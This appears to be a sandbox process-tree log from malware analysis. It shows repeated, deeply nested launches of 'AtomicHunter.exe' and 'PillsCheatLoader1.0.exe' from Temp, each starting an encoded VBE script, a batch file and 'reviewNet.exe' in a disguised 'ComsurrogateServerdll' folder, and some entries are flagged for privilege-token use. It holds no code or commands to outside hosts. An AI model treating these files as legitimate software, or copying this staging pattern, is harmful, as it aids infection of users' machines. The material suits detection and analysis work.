C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"72⤵PID:5684
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "73⤵PID:6524
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"74⤵PID:1888
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"71⤵PID:5360
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"70⤵PID:5732
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"71⤵PID:4896
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "72⤵PID:5812
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"73⤵PID:3484
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"69⤵PID:3936
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"70⤵PID:3412
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "71⤵PID:1472
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"72⤵PID:3084
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"68⤵PID:5396
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"69⤵PID:2892
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "70⤵PID:7060
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"71⤵PID:5532
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"68⤵PID:7900
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"67⤵PID:3212
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"68⤵PID:2440
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "69⤵PID:2880
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"70⤵PID:3708
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"67⤵PID:5004
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"66⤵PID:5196
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"67⤵PID:5104
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "68⤵PID:5172
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"69⤵PID:5688
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"66⤵PID:6152
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"65⤵PID:6948
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"66⤵PID:3444
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "67⤵PID:4984
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"68⤵PID:1592
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"64⤵PID:4068
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"65⤵PID:444
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "66⤵PID:3460
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"67⤵PID:6168
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"64⤵PID:1716
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"63⤵PID:6436
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"64⤵PID:1904
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "65⤵PID:3216
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"66⤵PID:5632
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"62⤵PID:6508
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"63⤵PID:6936
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "64⤵PID:4256
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"65⤵PID:6340
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"62⤵PID:2820
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"61⤵PID:3256
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"62⤵PID:6056
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "63⤵PID:3296
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"64⤵PID:6432
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"61⤵PID:6888
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"60⤵PID:2292
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"61⤵PID:6004
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "62⤵PID:3104
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"63⤵PID:5504
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"60⤵PID:3216
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"59⤵PID:5440
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"60⤵PID:4132
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "61⤵PID:4672
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"62⤵PID:3700
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"59⤵PID:5296
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"58⤵PID:6824
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"59⤵PID:4076
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "60⤵PID:1860
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"61⤵PID:4568
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"57⤵PID:6620
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"58⤵PID:5220
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "59⤵PID:3292
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"60⤵PID:6716
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"56⤵PID:7116
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"57⤵PID:3600
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "58⤵PID:4396
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"59⤵PID:6048
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"56⤵PID:2716
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"55⤵PID:4840
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"56⤵PID:4064
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "57⤵PID:4808
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"58⤵PID:5368
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"55⤵PID:5064
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"54⤵PID:4676
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"55⤵PID:4712
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "56⤵PID:6112
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"57⤵PID:5916
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"53⤵PID:3120
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"54⤵PID:5040
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "55⤵PID:2216
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"56⤵PID:5388
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"53⤵PID:1492
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"52⤵PID:3080
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"53⤵PID:860
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "54⤵PID:5904
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"55⤵PID:3024
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"52⤵PID:7372
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"51⤵PID:3696
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"52⤵PID:288
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "53⤵PID:5760
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"54⤵PID:2076
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"51⤵PID:6520
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"50⤵PID:7144
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"51⤵PID:6244
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "52⤵PID:5860
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"53⤵PID:3492
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"50⤵PID:6232
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"49⤵PID:7056
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"50⤵PID:6152
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "51⤵PID:5000
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"52⤵PID:7008
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"48⤵PID:7008
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"49⤵PID:7156
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "50⤵PID:5152
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"51⤵PID:6524
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"48⤵PID:5096
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"47⤵PID:6764
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"48⤵PID:6844
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "49⤵PID:6816
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"50⤵PID:4124
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"46⤵PID:6688
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"47⤵PID:6852
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "48⤵PID:6496
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"49⤵PID:6504
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"45⤵PID:6564
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"46⤵PID:6656
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "47⤵PID:3620
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"48⤵PID:4700
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"45⤵PID:5536
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"44⤵PID:6472
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"45⤵PID:6612
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "46⤵PID:5848
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"47⤵PID:3768
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"44⤵PID:4520
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"43⤵PID:6416
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"44⤵PID:6504
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "45⤵PID:3708
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"46⤵PID:5016
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"43⤵PID:7668
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"42⤵PID:6380
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"43⤵PID:6520
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "44⤵PID:3252
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"45⤵PID:4052
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"42⤵PID:3932
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"41⤵PID:6236
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"42⤵PID:6324
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "43⤵PID:6416
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"44⤵PID:3404
-
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"41⤵PID:7672
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"40⤵PID:4776
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"41⤵PID:4260
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "42⤵PID:3124
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"43⤵
- Suspicious use of AdjustPrivilegeToken
PID:6840 -
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"40⤵PID:5904
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"39⤵PID:6000
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"40⤵PID:3792
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "41⤵PID:4728
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"42⤵
- Suspicious use of AdjustPrivilegeToken
PID:6772 -
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"39⤵PID:5816
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"38⤵PID:4388
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"37⤵PID:4772
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"38⤵PID:5800
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "39⤵PID:7016
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"40⤵
- Suspicious use of AdjustPrivilegeToken
PID:5628 -
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"36⤵PID:4404
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"37⤵PID:5792
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "38⤵PID:7096
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"39⤵
- Suspicious use of AdjustPrivilegeToken
PID:2568 -
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"36⤵PID:5492
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"35⤵PID:3336
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"36⤵PID:4212
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "37⤵PID:5300
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"38⤵
- Suspicious use of AdjustPrivilegeToken
PID:3444 -
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"35⤵PID:6340
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"34⤵PID:3584
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"35⤵PID:2164
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "36⤵PID:3516
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"37⤵
- Suspicious use of AdjustPrivilegeToken
PID:5436 -
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"33⤵PID:2196
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"34⤵PID:3808
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "35⤵PID:2300
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"36⤵
- Suspicious use of AdjustPrivilegeToken
PID:5408 -
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"32⤵PID:1980
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"33⤵PID:2288
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "34⤵PID:5968
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"35⤵
- Suspicious use of AdjustPrivilegeToken
PID:4340 -
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"32⤵PID:2892
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"31⤵PID:3588
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"32⤵PID:3716
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "33⤵PID:4720
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"34⤵
- Suspicious use of AdjustPrivilegeToken
PID:5048 -
C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"C:\Users\Admin\AppData\Local\Temp\PillsCheatLoader1.0.exe"31⤵PID:6268
-
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"30⤵PID:3528
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"31⤵PID:3680
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "32⤵PID:4704
-
C:\ComsurrogateServerdll\reviewNet.exe"C:\ComsurrogateServerdll\reviewNet.exe"33⤵
- Suspicious use of AdjustPrivilegeToken
PID:5060 -
C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"C:\Users\Admin\AppData\Local\Temp\AtomicHunter.exe"29⤵PID:3440
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComsurrogateServerdll\RDd9GppQ7ML5mhN7zYUSje44cWW.vbe"30⤵PID:3496
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ComsurrogateServerdll\AK3g7uXXE.bat" "31⤵PID:4676
-
